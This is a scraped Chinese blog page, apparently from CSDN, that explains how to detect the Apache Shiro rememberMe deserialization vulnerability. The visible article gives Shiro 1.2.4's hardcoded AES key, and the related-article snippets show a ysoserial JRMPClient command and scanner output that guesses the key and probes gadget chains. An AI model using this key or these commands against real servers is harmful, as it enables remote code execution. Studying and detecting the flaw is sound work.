shiro反序列化检测工具_Shiro rememberMe反序列化攻击检测思路

最新推荐文章于 2024-06-11 19:15:14 发布
最新推荐文章于 2024-06-11 19:15:14 发布
阅读量3.6k 收藏 1
点赞数
文章标签: shiro反序列化检测工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39646658/article/details/111582732
版权

1、背景

Apache Shiro是一款强大且易用的Java安全框架,使用范围非常广泛。Shiro默认使用CookieRememberMeManager,其处理cookie的流程是:rememberMe cookie值–>Base64解码–>AES解密–>反序列化。在Shiro<=1.2.4版本下,AES密钥是硬编码的,导致攻击者可以构造加密的反序列化数据执行任意命令。

下载Shiro 1.2.4的代码,先看看CookieRememberMeManager.java文件,发现其继承AbstractRememberMeManager类。

0f7bb4c7435abdce54821272a923023e.png

跟进到AbstractRememberMeManager类,在80行发现定了私有常量DEFAULT_CIPHER _KEY_BYTES,值为Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="),而这就是我们需要找的硬编码AES key。

6b1c11429345de1c409be175dbb06988.png
最低0.47元/天 解锁文章
weixin_39646658
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化漏洞(ysoserial工具使用shiro反序列化利用)
qq_50854662的博客
05-26 1814
Java反序列化漏洞(ysoserial工具使用shiro反序列化利用)
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化分析
最新发布
2301_79724395的博客
06-11 743
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
shiro反序列化工具安装使用
weixin_71090536的博客
01-25 690
shiro_attack_2.2工具下载链接:链接: https://pan.baidu.com/s/1t8V8UCbupIcczr7sFfYKMg?pwd=975e 提取码: 975ePs:也可在 github 上直接搜索 “shiro反序列化利用”,有诸多工具可供使用
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7630
shiro -550 反序列化(一)
Shiro反序列化流量分析.pdf
05-10
攻击者可以构造恶意的RememberMe令牌(通常包含加密的用户信息),并通过反序列化过程执行任意代码。 攻击流程如下: 1. 攻击者生成恶意Payload,使用AES加密,并进行Base64编码。 2. 攻击者以"rememberMe={value}...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro反序列化漏洞,Shiro版本升级资源
06-22
shiro版本时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化漏洞的...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
Apache-Shiro反序列化1
08-03
Apache Shiro反序列化机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意命令。Shiro反序列化机制使用 Java 的反序列化机制,将用户输入的数据反序列化为 Java 对象。如果攻击者可以控制用户输入的数据,就...
shiro反序列化漏洞检测工具,含链接教程
08-17
[admin@ shiro]java - shiro_tool.jar https://xx.xx.xx.xx/ [-] target: https://xx.xx.xx.xx/ [-] target is use shiro [-] start guess shiro key. [-] shiro key: kPH+bIxk5D2deZiIxcaaaA== [-] check URLDNS [*] find: URLDNS can be use [-] check CommonsBeanutils1 [*] find: CommonsBeanutils1 can be use [-] check CommonsCollections1 [-] check CommonsCollections2 [-] check CommonsCollections3 [-] check CommonsCollections4 [-] check CommonsCollections5 [-] check CommonsCollections6 [-] check Commons
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
Shiro反序列化漏洞(CVE-2016-4437)+docker靶场+工具利用
weixin_46411728的博客
07-16 2192
shiro_attack_2.2
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用
yy1715713348的博客
03-29 1993
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。客常用的开发软件都在这里了,给大家节省了很多时间。
[Java反序列化]—Shiro反序列化(二)
Sentiment的博客
06-28 1661
前篇通过urldns链来检测shiro550反序列化的存在,本篇就通过CC链来进行shiro的代码执行shiro中默认是没有CC依赖的,所以需要我们自行加上直接用CC6的链来打,提示类加载不到是一个JVM的标记,说明实际上这是一个数组,也就是说不能加载这个。简单看下原因在shiro自定义的中,调用的是,而ois是的实例化跟进下,其中只有一个构造方法和,这个是在java原生反序列化时会调用的一个方法,这里对他进行了重写,retrun返回的是再看下原生类的 他return的则是,所以区别也就在这里shiro
解密工具 —— shiro加密数据
不忘初心,护天下安全!
09-18 916
实现本地利用112个默认key对shirorememberme数据进行解密,本工具用于蓝队同学对攻击进行研判。
Shiro反序列化检测与利用
Fuzz
02-25 4017
1. 前言 Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。 2. 环境搭建 环境搭建vulhub 3. 如何发现 第一种情况 返回包中包含rememberMe=deleteMe这个字段 第二种情况 直接发送原数据包,返回的数据中不存在关键字 可以通过在发送数据包的cookie中增加字段: rememberMe=deleteMe 然后查看返回数据包中是否存在关键字。 4. 自动检测Shiro反序列化之burp插件 https://g
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
shiro反序列化检测工具
07-29
\[1\]根据博文中的描述,shiro版本存在反序列化漏洞,其产生的原因是参数rememberMe存在硬编码,导致AES的Key也是硬编码,从而使得反序列化漏洞产生。\[2\]而升级到1.2.6版本后,通过使用ShiroExploit工具进行检测,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值